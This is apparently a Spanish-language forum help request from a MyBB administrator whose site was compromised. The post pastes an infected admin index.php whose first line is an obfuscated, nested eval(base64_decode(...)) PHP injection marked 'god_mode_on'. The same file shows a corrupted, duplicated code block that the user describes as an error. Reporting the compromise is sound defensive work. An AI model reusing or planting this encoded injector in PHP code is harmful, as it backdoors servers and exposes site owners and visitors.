Hola buenas tardes, les realizo una consulta, hoy nuevamente entro a mi web y encuentro un codigo enorme de error en la cabezera, esto paso hace un tiempo pero era otro codigo, lo raro de esto es que me modifica los archivos de la carpeeta adm de mybb y otros mas, que sean .php, yo en mi caso cambie el nombre de la carpeta adm de mybb la ultima vez pero parece que no sirve hacer eso, en si el codigo esta vez es diferente pero este modifico la cabezera de mas archivos, ejemplo este es el index.php que esta en /foro/adm/index.php (el mismo codigo esta en varios archivos php)
como ven en el comienzo del archivo se ve una enorme cantidad de codigo que obviamente no tiene que estar, esto es un intento de hack? o un bug de mybb?
EDIT:
agrego como detalle que la ultima vez borre el codigo ese en todas las plantillas y se arreglo pero ahora me indica en el caso de esta plantilla que igual tengo un error en la linea 256 que con el notepad++ seria esta:
<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVldwS1YwMUdVbGhTYmxKYVZUSjBkMXBVU21GTlYwcDBWR3BDYUZaNmJERlRWV00xWkRGc1dFNVlTbWhWTW1SeVYxYzFWMkpWZEZsak1uUmhUV3BzY2xkRVNYaGtiSEJJVmxka1VWVXdSbkpYUkVaUFVteFdjMWRyV2xaaVNFNXdWMnBKTldSc2NFUlRiVkpRWlZWS05scEZhRXRhYlU1MFZtNWthVkl3V25GWGJFNXVZVmRHU1ZOdGVHRmhWV3g2VTFjeGIyVldjRmhYVjJ4TlUwVTBkMWt5TlZOa2JVcElUMVJPWVZkRmJIWlRhMlJMVFZad2NHRXpUa3RTTURVeFdrVlpOV0l3ZEZWak1tUnFUVEZLTlZkRVRrdGlSMDVJWlVkb1drMXNWblpUVjNBelRESldTRTFZVGtwaFdHUndWVVZSTlU1SFNsaGtNbXhOVTBVMGQxa3lOVk5rYlVwSVQxUk9ZVmRGYkhaVGEyUkxUVlp3Y0dFelRrdFNNRFV4V2tWWk5VNUZkRlZqTW1SS1VqSjRkRk5WVG01aU1IQklWRzVXYTFKcWJIWlRWVkV3V2pBeGNHRXlNVXRoVjJSeVYxUkpNVTFHWjNwYU1tUlJWa1JDYmxSVlRuSmpSV3hKWXpKMFdtSnNXblJUVlZGM1dqQndTRnBJV21GU2Ftd3dXV3BLVTJKRmJFUk9SMlJMVWpCdmVGZHRjREJQVld4SlUyMTRhMU5HV2pWWmJXeENZVEZzZFZadE1WQmxWVWsxVTFWa1lVMVhTblJVYWtKb1ZucHNNVk5WVm10aVIxSkdUVmRvYVZZd1ZuWlRNV2g2WVRKS1dFOVVRbWhTTVZvMVUxVlJkMW93YkhWVWFrWnBZVlJXZUZkV1kzaGtNazQxVGxkd2FVMXFRakZYVm1oS1lWVTRlbE50ZUd0VFJsbzFXVzFzUW1FeVNsaFBWRUpvVWpGYU5WUjZUWGhrYkd4elQxaHdhMUl3V2pWYVJVNXVZVmRKZWxGdGFHbGlXRkozVTFkc2NrNHdjRWxVYlRscFRUSk9ibFZHVGtOaVZteFlaVWh3WVZaSVVuUmFSbU14WVcxU1NHSklXbWxoVlVwdldWVmtZVTFXY0VoWGJrNWhZbTVDY2xsVlpHRmlNazQxV2pKMGFsSXdWbmRhVkVwcll6SkplVk50YUdsUk1FWnlXWHBLYjJSdFVqWmpNbVJoVFc1b01sZFhNVWRqTUd4RVZXMDFhVTFzU20xWmJHTTFZVEZ3VldNeVpFdFNla1p2V1d4a1Jsb3hRbFJSYTJoaFYwWktUMWRXWTNoaFJYUkVZWHBrUzFJeGNIZFphMlJXV2pGQ1ZGRnFSbXBpV0doeldXMHhUMlJzY0VoV1Z6bFpUVlJzU0ZVeFZqUlNiR2Q0VDBoQ1VFMXRlSFJUVlU1dlkwZE5lbFJ0ZUd0Uk1tUnlWMFJHVDFKc1ZuTlhhMXBXWWtoT2NGVXdXbE5XVmxaSFQxVnNWVTFWTlZaVFYzZDNZMFYwV1dNeWRHaFNlbXcyV2tWT1FrOVZiRVJWYlZwV1RVWmFWRlp0ZEZkVk1XUTFVMnRzVjFKc1NsSlhSRUp2VlVaVmVGVlhiRmxXU0ZFMVdWWmtXbG93ZEVoaVNIQnFUV3haZDFNd1RsTmFiRlYzVm14T1YyRXhXbFJXTTJ4TFZURktWazFXUWxkU1ZscHRWVlpXVTFKV1ZuQlRiVkpNVlRKM00xTnJaSE5rTUd4RlRVZGtTMUpxYkZWVmJGcExWakZLVjFOdFNrcGlSWEJIVmtaVk5WWldTbGRQVlVwVFVsWktWRk5YZDNkT01scFlZa2N4U2xFeWFIZFplazVQWWtkU1JGb3lkRmxOVlRWSFZsZDRZVkpzVm5Oak1teFVVbXhLVmxaVldUVlZNVXBXVjJ0YVZtRXhXbFJUVjNkM1kwVjBXV015ZEdwaVZscDBVMVZSZDFveVVsbFRiazVoVm5wV2NWbHFTbE5pUlhSRVZXMWFWazFHV2xSV2JYUlhWVEZrTlZOcmJGZFNiRXBTVjBSR1MxSnNTbkpXYkU1VFZtdHNjRmRHVG5KT01scFlZa2N4U2xFeWFIZFplazVQWWtkU1JGb3lkRmxOVlRWSFZsZDRZVkpzVm5Oak1teFVVbXhLVmxaVldUVldiRlYzVm14T1dVMUZXa2xWYkZVeFZsVnNjMDFJUWt4WFNFNXlXa1prUmxveFFsUlJha1pxWWxob2MxbHRNVTlrYkhCSVZsYzVhazB4U2pWYVJXTTFZekpKZWxwSGVHcGhWMlJ5VjBSR1QxSnNWbk5YYTFwV1lraE9jRlV3V2xOV1ZsWkhUMVphVmsxR1dsUlhSRUpIVTBaS1ZrNVdWa3BpUkVKM1V6RlNNRTlWY0VsV2JteHBVVEJGTlZOVlRrdGlNbEpKVlc1a1VHRlVhREpUVjJ4Q1pGVnNSRlZ1WkZwVk1FWXhVMVZPU21SdFNYcFJibVJOWW10S2Rsa3dVVFZrUjBsNlZXMDVZVmRGYXpWVFYyeENaRlZ3U0UxWGFHbFdNRlp1VkVkc1FtRlZjSFJYYmtKcFVqRlZOVk5YYkVKa1ZXeEVWVzB4YUZZemFITlRWVTB3V2pCc2NGZHRPV2xOTURSM1ZVWk9TbG93ZUhCUlYzUm9VbnBzTmxwRlRrSmtWV3hFVTFjeGFGZEZSVFZUVjJ4Q1pGVnNSRlZ1UW1wUk1FWXhVMVZPU21KWFRuUldiVEZSVlRCc2JsUkhiRUpoTWs1MFZtMHhTbEY2VW01VFYyeGhUVlpzVlUxSGJFcFJlbEp5V2taa1JrNHlSbGhYVnpsS1VqRnZlRmx0TVU5TlIwWllUMWhXV1Uxc1dUQlpWbWhQVFVkT05Wb3liRnBOTVZvMVdXdFpOV05IU25SaVJFSktZVmQwYmxNeGFIcGhNV3Q1V2pKa1VWVXdTbkZhUm1oTFl6Rm5lV0pJVm1oWFJrWjJVMnRvVjJWWFNrUmhlbVJhVFRGYU5WbHJXVFZsYkhCWlZXNWFhbE5HUm5aVGEyUlBZakI0UkZGclVsZFdhM0JPVmtSR1ExWldaM2hUYTFwWFVteGFWRlpIZUZOVk1VWldUbFpTVTJFeFdsUlVSVTVDWlVWMFZXUkhjR3RYUlhCNlYwUk9UMkpIVWtoUFdHUnJVVEprY2xkVVNtNWpNR3hHVkd4YVZtRXphRkZXVlZwVFdteGFSbUpGTlZOV1ZHeFhWbXRPTTFvd01UVmhlbVJMVTBaYWVscEZUa0pQVld4SVZHcEdhbUpZYUcxWGJHaHZZa1pzTlZveWRGcE5iV1IzVkhwTmQxb3hjRmhsU0hCaFZUQkpNMU5yYUZkak1sSkVVVlJzU2xKVlNuUlpWbVEwWWtabmVWcEhlR3RTYW14eFdXcEpNVTFHY0ZoT1ZFSnFaVmRrY2xwR2FFdGpNSFJWWkVSc1NsSXllSFJUVlU1dlpXMVNTVk51WkdsTk1ERjJVMnRvVjJNeVVrUmtNbXhoVjBad2IxbHJUa3BqUld4RVVsUnNVVlV3U25SWFZtUTBaV3h3VkdKRVpFdFRSemx1VlVaT1EyVnRVa2xUYlZwcVlsWmFNMWxyWkVkaGJIQlVXakpzWVZkR2NHOVphMDVLWXpCc2NGTllUa3RUUmxwNldrVk9jazR3YkVoV2FrcGFWak5rZGxOcmFIWmpSVGsxVVZkMGFrMXRhREphU0d4Q1QxVnNTVlZ1Ykd0V01WVXpVMVZvUzJKSFVrbFdibXhwWVZWSmQxa3lOVmRpUlRoNlRVZGthRll4Ykc1VE1HaFBUVWRPZFZGdVdtcGxWMlJ5V2taa05FMUZlRVJUYlhoYVlsUldiMU5YYkhKYU1HeFZUVVJzU2xJeGNHOVphMmhQWWtWMFdXTXlkR3hoVlVVMVUxVm9UMDFIVG5OUFdHeGhWMFZLZWxkV1pFOWlSWFJFVTIxNFdtSlVWbTlUVjJ3ellWVnNjR1F5ZEd0V00yZDNVekZTZWxvd2NFaGFTRnBoVW1wc01GbHFTbE5pUld4RlRVZGtTMU5IT0ROVFZVNVRaVzFHU0U5VVRrcFNSRUp1V2tWb1MwMVdjRlZqTW1ScVlsWlpkMXBHYUV0a1ZXeEpWVzVzYTFZeFZUTlRWVTVUV214VmQxWnNUbGRoTVZwVVZqTnNTMkp0U1hsUFYzUktZa1JDYmxWR1RrSmhNVzk1VDFkMFdVMXFSakpYYTJSV1RqQnNTVTFIWkdGV00yZzJWMnhPUTA0eVRuUldha0pyVjBWd01WTlZaR0ZoUjBwSlZHMTRVRTE2UlRWVGEyUmhZVWRTU0dGSGVHcGlTRkpyVTFWUmQxb3diSEZTVkVKUFlWUlNORlF3VWxaa1ZURnhWbFJDVFdGcmEzZFViRTVLVGpCd1NGZHRhR3RTTW1oeldUSjRNRnBGYkVWTlIyUktZV3N4TkZSSGNFWk9SVFZFVGtoc1QxSkZiREZVVmxKQ1pXdHNjV015ZEdGaVZWbDNXVlZrVjJWV1kzaE5SMlJSVlRCR2NGUXhVa1prVlRGVllYcEtUV0ZyYkRSVWJXc3daVVUxUlZveWJGQmxWa3AwVjFab1UySXhjRmxUYlVwWlZUQkZOVk5WVGtwT1ZURlVUa2hvVUZaR2JERlVWM0JHVFd0NGNWVlVWa3BoYmxKMFdXcE9TMkpHYkZoVWJUbE1VVEZLZEZkV2FGTmlNWEJaVTFka1dsZEZNVzVUYTJoWFpWVjBXV1JJUW1GaFZVWjJVMVZrUjJJeGNIVldiWFJoWWxob2RGcFhNVk5pTVhCMFlVaHdURkV4U1hoWk1teHlXakIwVkZGcVpFcFNNSEExVjJ4a1IyTnJiRVZrUkd4dFZqSjRkRk5WVG01aE1rMTVZVWhhYTJWVlJUVlZSbEYzV2pGd2RGSnVUbXBOYkZaM1dsaHNVMlZzYTNwVGJrSnFVMFpGTlZOdWNEUmxiR3Q2VTI1Q2FsTkdSWEphUnpGSFpWVnNSMDlJWkd4U1IyaHZWMWR3YWs5V1pEVlRiVTVzVWtVeE5GZEZhRzVsYXpWSFpVUlNUbVZzY0dwYVZWSkxVbXhvU1ZvemNFNVdibWN3VkZod2Ixa3lWa1ZVVkVaWlUwZGtOVlZzV2pST1JURTJVMjFPYkZKRk1IaFhSV2h1WldzMVIyVkVVazVoTVZwcVdsVlNUbVZXYUVsYU0zQlBVbTVuTUZSWWNGWmhWWGhFVTIxT2JGSkZNVFpYUldodVpXc3hWMlZFVWs1aE1WcHFXbFZTVG1WR2FFbGFNM0JRVW01bk1GUlljRk5aTWxaRlUydGFXVk5IWkRaVVYzZzBUa1V4TmxWdFRteFNSVEUxVjBWb2JtVldTbGRsUkZKT1pXdGFhbHBWVWs1a01XaEpXak53VG1WVmJIcFRWM2cwVGtVeE5tSkhUbXhTUlRFMFYwVm9ibVZXU2xkbFJGSk9aV3RhYWxwVlVrNU9WbWhKV2pOd1QySklaekJVVjNSWFdUSldSVlJZYkZsVFIyUTJWRlphTkU1Rk1UWlhiVTVzVWtWd1IxZEZhRzVsYXpGWFpVUlNUbVZzU21wYVZWSk9Ua1ZzY0dReWJGbFRSMlEyVkRGYU5FNUZNVFpTYlU1c1VrVndSMWRGYUc1bGF6RlhaVVJTVG1WdGVHcGFWVkpPVFd4b1NWb3piRk5XYm1jd1ZGaHdTMWt5VmtWVVdHaFpVMGRrTmxSdGVEUk9SVEZ5Vm0xT2JGSkZNSGRYUldodVpXczVWRk5ZVGtwaVNHY3dWRzV3VDFreVZrVlhXSEJaVTBkamVsUlhlRFJPUlRWeFlrZE9iRkpIVGpOWFJXaHVUVEExUkZOWVRrcGlTR2N3Vkcxd1Qxa3lWa1ZaTTJ4WlUwZGplVlJzV2pST1JUVnhVbTFPYkZKSFRYZFhSV2h1VFdzMVYyVkVVazlTUmxwcVdsVlNZVkpHYUVsYWVrcFBWbTVuTUZSdGRGTlpNbFpGVjFSR1dWTkhZM2xWYkZvMFRrVTFObFZYYkUxUk1IQnFXbFZTYW1Wc2FFbGFlazVPWWtobk1GUnRjRTVoVlhoRVUyMU9iRkpHYXpCWFJXaHVUVEExUjJWRVVrOWxiRXBxV2xWU2FtUXhhRWxhTTNCU1ZtNW5NRlJYZEdGWk1sWkZVMnRrU21GWVpIQlhSV2h1WlZaS2MyVkVVazlsYXpWcVdsVlNTMUpzYUVsYWVrNU9VbTVuTUZSdGNHOVpNbFpGV1ROa1NtRllaSEJYUldodVRXczVSMlZFVWs5aGJGcHFXbFZTV21WR2FFbGFla3BQVVRCc2VsTlhlRFJPUlRWeFdrZE9iRkpHYTNoWFJXaHVUVEExUjJWRVVrOVNSbHBxV2xWU1lWSkdhRWxhZWtwUFZtNW5NRlJ0ZEZOWk1sWkZWMVJHV1ZOSFkzbFZiRm8wVGtVMU5sVnRUbXhTUjA0MlYwVm9iazFGTVhObFJGSlBaVzE0YWxwVlVsWk5SbWhKV25wS1RsWnVaekJVYlhCcldUSldSVlZyV2xsVFIyTjVWRlphTkU1Rk5YSlZiVTVzVWtacmVGTlhiRE5oVm1oSlducEtUbFp1WnpCVWJuQkRXVEpXUlZrelpGbFRSMk41Vkd4YU5FNUZOWEpXYlU1c1VrWnJkMWRGYUc1TlJUQjRaVVJTVDJGdGFHcGFWVkphVGxab1NWcDZTbEpOV0djd1ZHMXdVbUZXYUZWa1JFcGFWMFZzYmxkSWNFTk9SbXhWVkZSQ1RsWkVSbWxYU0hCRFRrVTVTRkp0YkU5TldFNHpWMFpPTkZwck1VbGFlbEphVmpCcmVsWXpjRWRhUlhoSFQwaGtiRkpIYUc5WFYzQnJXV3N4YzAxSVRsbGxhMGt3VkRCa1IyRlZOSGhqTTNCWlZtcEJNMWR0TURWbFZYUkpWMjFvYW1GVlNuZFRWV1J6WkZWc1IwOUlaR3hTTUZZMlZHdFNSbU5IVlhwWGJXaHFZVlZLZUZremIzaGhNa2w1VkdwR2FWWXhXakZhUlZvd1dtc3hTVnA2VWxwV01HdDZWak53VjFwR2FGUmhSMXBPVTBkak1GZFdaRXBOTVdRMlZXMVNURlpJVW5oWmVrWXdXbXN4U1ZwNlVscFdNR3Q2VmpOd1lWcEdhRlZOVjFwT1UwZGpNRmRXWkVwTk1XUTJXa2RTVEUxVWFETmFWV1JHWldzMVJWSnRTbWhXYWtKNVYwaHdRMDVGT1VoU2JXeFBUVmhOTUZkR1VqQk5iR3haVTFka2FGSXhXbTlYYTFGNFlUSkplVlJxUm1sV01Wb3hXa1ZhTUZwck1VbGFlbEphVmpCcmVsWXpjRVprTVdoWFRVYzVXV1ZyU1RCVU1HUkhZVlUwZUdONlZsbFZNbmhwVkZWWmQwNHlSa2hXYldoaFVtNVNiVlJWYUc1T1JteFlVMVJPV0dWclZqUlhSbGwzWWpKR2RWUllRbEJOZWtKdVZETndNMlJ0VFhsVWJteG9WMFZKZDFWSGJHcE9NR3hFVVZkMFlVMXFiSEpYUkVsNFpHeHdTRlpYWkZGVk1FWnlXWHBLVDJWWFJsbFJha0pRVFhwQ2JsTnJXVFZXUmtwWFUyeGtVMVpyY0dsVFZ6RnJaRzFKZVZWWGJGbFZNRVUxVTFWT1UySnRTWGxWYlZwcFZucHNjbGRzVW5wYU1scFNVRlF3YVV0VGF6ZEpRVDA5SWlrcE95QT0iKSk7IA==")); /*god_mode_off*/ ?><?php ?><?php ?><?php ?><?php
/**
* MyBB 1.6
* Copyright 2010 MyBB Group, All Rights Reserved
*
* Website: http://mybb.com
* License: http://mybb.com/about/license
*
* $Id: index.php 5441 2011-04-16 09:07:17Z jammerx2 $
*/
define("IN_MYBB", 1);
define("IN_ADMINCP", 1);
// Here you can change how much of an Admin CP IP address must match in a previous session for the user is validated (defaults to 3 which matches a.b.c)
define("ADMIN_IP_SEGMENTS", 3);
require_once dirname(dirname(__FILE__))."/inc/init.php";
send_page_headers();
if(!isset($config['admin_dir']) || !file_exists(MYBB_ROOT.$config['admin_dir']."/inc/class_page.php"))
{
$config['admin_dir'] = "admin";
}
define('MYBB_ADMIN_DIR', MYBB_ROOT.$config['admin_dir'].'/');
define('COPY_YEAR', my_date('Y', TIME_NOW));
require_once MYBB_ADMIN_DIR."inc/class_page.php";
require_once MYBB_ADMIN_DIR."inc/class_form.php";
require_once MYBB_ADMIN_DIR."inc/class_table.php";
require_once MYBB_ADMIN_DIR."inc/functions.php";
require_once MYBB_ROOT."inc/functions_user.php";
if(!file_exists(MYBB_ROOT."inc/languages/".$mybb->settings['cplanguage']."/admin/home_dashboard.lang.php"))
{
$mybb->settings['cplanguage'] = "english";
}
$lang->set_language($mybb->settings['cplanguage'], "admin");
// Load global language phrases
$lang->load("global");
if(function_exists('mb_internal_encoding') && !empty($lang->settings['charset']))
{
@mb_internal_encoding($lang->settings['charset']);
}
header("Content-type: text/html; charset={$lang->settings['charset']}");
$time = TIME_NOW;
$errors = null;
if(is_dir(MYBB_ROOT."install") && !file_exists(MYBB_ROOT."install/lock"))
{
$mybb->trigger_generic_error("install_directory");
}
$ip_address = get_ip();
unset($user);
// Load Admin CP style
if(!$cp_style)
{
if(!empty($mybb->settings['cpstyle']) && file_exists(MYBB_ADMIN_DIR."/styles/".$mybb->settings['cpstyle']."/main.css"))
{
$cp_style = $mybb->settings['cpstyle'];
}
else
{
$cp_style = "default";
}
}
$default_page = new DefaultPage;
$logged_out = false;
$fail_check = 0;
$post_verify = true;
if($mybb->input['action'] == "logout")
{
// Delete session from the database
$db->delete_query("adminsessions", "sid='".$db->escape_string($mybb->cookies['adminsid'])."'");
my_setcookie("adminsid", "");
$logged_out = true;
}
elseif($mybb->input['action'] == "unlock")
{
$user = array();
if($mybb->input['username'])
{
$query = $db->simple_select("users", "*", "LOWER(username)='".$db->escape_string(my_strtolower($mybb->input['username']))."'");
$user = $db->fetch_array($query);
if(!$user['uid'])
{
$error[] = $lang->error_invalid_username;
}
}
else if($mybb->input['uid'])
{
$query = $db->simple_select("users", "*", "uid='".intval($mybb->input['uid'])."'");
$user = $db->fetch_array($query);
if(!$user['uid'])
{
$error[] = $lang->error_invalid_uid;
}
}
// Do we have the token? If so let's process it
if($mybb->input['token'] && $user['uid'])
{
$query = $db->simple_select("awaitingactivation", "COUNT(aid) AS num", "uid='".intval($user['uid'])."' AND code='".$db->escape_string($mybb->input['token'])."' AND type='l'");
// If we're good to go
if($db->fetch_field($query, "num") > 0)
{
$db->delete_query("awaitingactivation", "uid='".intval($user['uid'])."' AND code='".$db->escape_string($mybb->input['token'])."' AND type='l'");
$db->update_query("adminoptions", array('loginlockoutexpiry' => 0, 'loginattempts' => 0), "uid='".intval($user['uid'])."'");
admin_redirect("index.php");
}
else
{
$error[] = $lang->error_invalid_token;
}
}
$default_page->show_lockout_unlock();
}
elseif($mybb->input['do'] == "login")
{
$user = validate_password_from_username($mybb->input['username'], $mybb->input['password']);
if($user['uid'])
{
$query = $db->simple_select("users", "*", "uid='".$user['uid']."'");
$mybb->user = $db->fetch_array($query);
}
if($mybb->user['uid'])
{
if(login_attempt_check_acp($mybb->user['uid']) == true)
{
$default_page->show_lockedout();
}
$db->delete_query("adminsessions", "uid='{$mybb->user['uid']}'");
$sid = md5(uniqid(microtime(true)));
// Create a new admin session for this user
$admin_session = array(
"sid" => $sid,
"uid" => $mybb->user['uid'],
"loginkey" => $mybb->user['loginkey'],
"ip" => $db->escape_string(get_ip()),
"dateline" => TIME_NOW,
"lastactive" => TIME_NOW,
"data" => "",
);
$db->insert_query("adminsessions", $admin_session);
$db->update_query("adminoptions", array("loginattempts" => 0, "loginlockoutexpiry" => 0), "uid='".intval($mybb->user['uid'])."'", 1);
my_setcookie("adminsid", $sid);
my_setcookie('acploginattempts', 0);
$post_verify = false;
$mybb->request_method = "get";
if($mybb->input['module'])
{
admin_redirect("index.php?module=".$mybb->input['module']);
}
}
else
{
$query = $db->simple_select("users", "uid,email", "LOWER(username) = '".$db->escape_string(my_strtolower($mybb->input['username']))."'");
$login_user = $db->fetch_array($query);
if($login_user['uid'] > 0)
{
$db->update_query("adminoptions", array("loginattempts" => "loginattempts+1"), "uid='".intval($login_user['uid'])."'", 1, true);
}
$loginattempts = login_attempt_check_acp($login_user['uid'], true);
// Have we attempted too many times?
if($loginattempts['loginattempts'] > 0)
{
// Have we set an expiry yet?
if($loginattempts['loginlockoutexpiry'] == 0)
{
$db->update_query("adminoptions", array("loginlockoutexpiry" => TIME_NOW+(intval($mybb->settings['loginattemptstimeout'])*60)), "uid='".intval($login_user['uid'])."'", 1);
}
// Did we hit lockout for the first time? Send the unlock email to the administrator
if($loginattempts['loginattempts'] == $mybb->settings['maxloginattempts'])
{
$db->delete_query("awaitingactivation", "uid='".intval($login_user['uid'])."' AND type='l'");
$lockout_array = array(
"uid" => $login_user['uid'],
"dateline" => TIME_NOW,
"code" => random_str(),
"type" => "l"
);
$db->insert_query("awaitingactivation", $lockout_array);
$subject = $lang->sprintf($lang->locked_out_subject, $mybb->settings['bbname']);
$message = $lang->sprintf($lang->locked_out_message, htmlspecialchars_uni($mybb->input['username']), $mybb->settings['bbname'], $mybb->settings['maxloginattempts'], $mybb->settings['bburl'], $mybb->config['admin_dir'], $lockout_array['code']);
my_mail($login_user['email'], $subject, $message);
}
$default_page->show_lockedout();
}
$fail_check = 1;
}
}
else
{
// No admin session - show message on the login screen
if(!isset($mybb->cookies['adminsid']))
{
$login_message = "";
}
// Otherwise, check admin session
else
{
$query = $db->simple_select("adminsessions", "*", "sid='".$db->escape_string($mybb->cookies['adminsid'])."'");
$admin_session = $db->fetch_array($query);
// No matching admin session found - show message on login screen
if(!$admin_session['sid'])
{
$login_message = $lang->invalid_admin_session;
}
else
{
$admin_session['data'] = @unserialize($admin_session['data']);
// Fetch the user from the admin session
$query = $db->simple_select("users", "*", "uid='{$admin_session['uid']}'");
$mybb->user = $db->fetch_array($query);
// Login key has changed - force logout
if(!$mybb->user['uid'] || $mybb->user['loginkey'] != $admin_session['loginkey'])
{
unset($mybb->user);
}
else
{
// Admin CP sessions 2 hours old are expired
if($admin_session['lastactive'] < TIME_NOW-7200)
{
$login_message =nattempts'], $mybb->settings['bburl'], $mybb->config['admin_dir'], $lockout_array['code']);
my_mail($login_user['email'], $subject, $message);
}
$default_page->show_lockedout();
}
$fail_check = 1;
}
}
else
{
// No admin session - show message on the login screen
if(!isset($mybb->cookies['adminsid']))
{
$login_message = "";
}
// Otherwise, check admin session
else
{
$query = $db->simple_select("adminsessions", "*", "sid='".$db->escape_string($mybb->cookies['adminsid'])."'");
$admin_session = $db->fetch_array($query);
// No matching admin session found - show message on login screen
if(!$admin_session['sid'])
{
$login_message = $lang->invalid_admin_session;
}
else
{
$admin_session['data'] = @unserialize($admin_session['data']);
// Fetch the user from the admin session
$query = $db->simple_select("users", "*", "uid='{$admin_session['uid']}'");
$mybb->user = $db->fetch_array($query);
// Login key has changed - force logout
if(!$mybb->user['uid'] || $mybb->user['loginkey'] != $admin_session['loginkey'])
{
unset($mybb->user);
}
else
{
// Admin CP sessions 2 hours old are expired
if($admin_session['lastactive'] < TIME_NOW-7200)
{
$login_message = $lang->error_admin_session_expired;
$db->delete_query("adminsessions", "sid='".$db->escape_string($mybb->cookies['adminsid'])."'");
unset($mybb->user);
}
// If IP matching is set - check IP address against the session IP
else if(ADMIN_IP_SEGMENTS > 0)
{
$exploded_ip = explode(".", $ip_address);
$exploded_admin_ip = explode(".", $admin_session['ip']);
$matches = 0;
$valid_ip = false;
for($i = 0; $i < ADMIN_IP_SEGMENTS; ++$i)
{
if($exploded_ip[$i] == $exploded_admin_ip[$i])
{
++$matches;
}
if($matches == ADMIN_IP_SEGMENTS)
{
$valid_ip = true;
break;
}
}
// IP doesn't match properly - show message on logon screen
if(!$valid_ip)
{
$login_message = $lang->error_invalid_ip;
unset($mybb->user);
}
}
}
}
}
}
if(!$mybb->user['usergroup'])
{
$mybbgroups = 1;
}
else
{
$mybbgroups = $mybb->user['usergroup'].",".$mybb->user['additionalgroups'];
}
$mybb->usergroup = usergroup_permissions($mybbgroups);
if($mybb->usergroup['cancp'] != 1 || !$mybb->user['uid'])
{
$db->delete_query("adminsessions", "uid='".intval($mybb->user['uid'])."'");
unset($mybb->user);
my_setcookie("adminsid", "");
}
if($mybb->user['uid'])
{
$query = $db->simple_select("adminoptions", "*", "uid='".$mybb->user['uid']."'");
$admin_options = $db->fetch_array($query);
if(!empty($admin_options['cpstyle']) && file_exists(MYBB_ADMIN_DIR."/styles/{$admin_options['cpstyle']}/main.css"))
{
$page->style = $cp_style = $admin_options['cpstyle'];
}
// Update the session information in the DB
if($admin_session['sid'])
{
$db->update_query("adminsessions", array('lastactive' => TIME_NOW, 'ip' => $db->escape_string(get_ip())), "sid='".$db->escape_string($admin_session['sid'])."'");
}
// Fetch administrator permissions
$mybb->admin['permissions'] = get_admin_permissions($mybb->user['uid']);
}
// Include the layout generation class overrides for this style
if(file_exists(MYBB_ADMIN_DIR."/styles/{$cp_style}/style.php"))
{
require_once MYBB_ADMIN_DIR."/styles/{$cp_style}/style.php";
}
// Check if any of the layout generation classes we can override exist in the style file
$classes = array(
"Page" => "DefaultPage",
"SidebarItem" => "DefaultSidebarItem",
"PopupMenu" => "DefaultPopupMenu",
"Table" => "DefaultTable",
"Form" => "DefaultForm",
"FormContainer" => "DefaultFormContainer"
);
foreach($classes as $style_name => $default_name)
{
// Style does not have this layout generation class, create it
if(!class_exists($style_name))
{
eval("class {$style_name} extends {$default_name} { }");
}
}
$page = new Page;
$page->style = $cp_style;
// Do not have a valid Admin user, throw back to login page.
if(!$mybb->user['uid'] || $logged_out == true)
{
if($logged_out == true)
{
$page->show_login($lang->success_logged_out);
}
elseif($fail_check == 1)
{
$page->show_login($lang->error_invalid_username_password, "error");
}
else
{
// If we have this error while retreiving it from an AJAX request, then send back a nice error
if($mybb->input['ajax'] == 1)
{
echo "<error>login</error>";
die;
}
$page->show_login($login_message, "error");
}
}
$page->add_breadcrumb_item($lang->home, "index.php");
// Begin dealing with the modules
$modules_dir = MYBB_ADMIN_DIR."modules";
$dir = opendir($modules_dir);
while(($module = readdir($dir)) !== false)
{
if(is_dir($modules_dir."/".$module) && !in_array($module, array(".", "..")) && file_exists($modules_dir."/".$module."/module_meta.php"))
{
require_once $modules_dir."/".$module."/module_meta.php";
// Need to always load it for admin permissions / quick access
$lang->load($module."_module_meta", false, true);
$has_permission = false;
if(function_exists($module."_admin_permissions"))
{
if(isset($mybb->admin['permissions'][$module]))
{
$has_permission = true;
}
}
// This module doesn't support permissions
else
{
$has_permission = true;
}
// Do we have permissions to run this module (Note: home is accessible by all)
if($module == "home" || $has_permission == true)
{
$meta_function = $module."_meta";
$initialized = $meta_function();
if($initialized == true)
{
$modules[$module] = 1;
}
}
else
{
$modules[$module] = 0;
}
}
}
$plugins->run_hooks_by_ref("admin_tabs", $modules);
closedir($dir);
if(strpos($mybb->input['module'], "/") !== false)
{
$current_module = explode("/", $mybb->input['module'], 2);
}
else
{
$current_module = explode("-", $mybb->input['module'], 2);
}
if($mybb->input['module'] && isset($modules[$current_module[0]]))
{
$run_module = $current_module[0];
}
else
{
$run_module = "home";
}
$action_handler = $run_module."_action_handler";
$action_file = $action_handler($current_module[1]);
if($run_module != "home")
{
check_admin_permissions(array('module' => $page->active_module, 'action' => $page->active_action));
}
// Set our POST validation code here
$mybb->post_code = generate_post_check();
// Only POST actions with a valid post code can modify information. Here we check if the incoming request is a POST and if that key is valid.
$post_check_ignores = array(
"example/page" => array("action")
); // An array of modules/actions to ignore POST checks for.
if($mybb->request_method == "post")
{
if(in_array($mybb->input['module'], $post_check_ignores))
{
$k = array_search($mybb->input['module'], $post_check_ignores);
if(in_array($mybb->input['action'], $post_check_ignores[$k]))
{
$post_verify = false;
}
}
if($post_verify == true)
{
// If the post key does not match we switch the action to GET and set a message to show the user
if(!isset($mybb->input['my_post_key']) || $mybb->post_code != $mybb->input['my_post_key'])
{
$mybb->request_method = "get";
$page->show_post_verify_error = true;
}
}
}
$lang->load("{$run_module}_{$page->active_action}", false, true);
$plugins->run_hooks("admin_load");
require $modules_dir."/".$run_module."/".$action_file;
?>como ven en el comienzo del archivo se ve una enorme cantidad de codigo que obviamente no tiene que estar, esto es un intento de hack? o un bug de mybb?
EDIT:
agrego como detalle que la ultima vez borre el codigo ese en todas las plantillas y se arreglo pero ahora me indica en el caso de esta plantilla que igual tengo un error en la linea 256 que con el notepad++ seria esta:
$login_message =nattempts'], $mybb->settings['bburl'], $mybb->config['admin_dir'], $lockout_array['code']);
gracias por la respuesta papi, los permisos son en todos los archivos modificados 444, ahora estoy restaurando archivos, plugins osea casi todos los archivos .php estan modificados, encima tengo un backup pero es viejo T-T
compresion se refieren a gzip? si es eso lo tengo siempre desactivado, esto es lo que me muestra en footer:
Generated in 0.5084991 seconds (43.59% PHP / 56.41% MySQL)
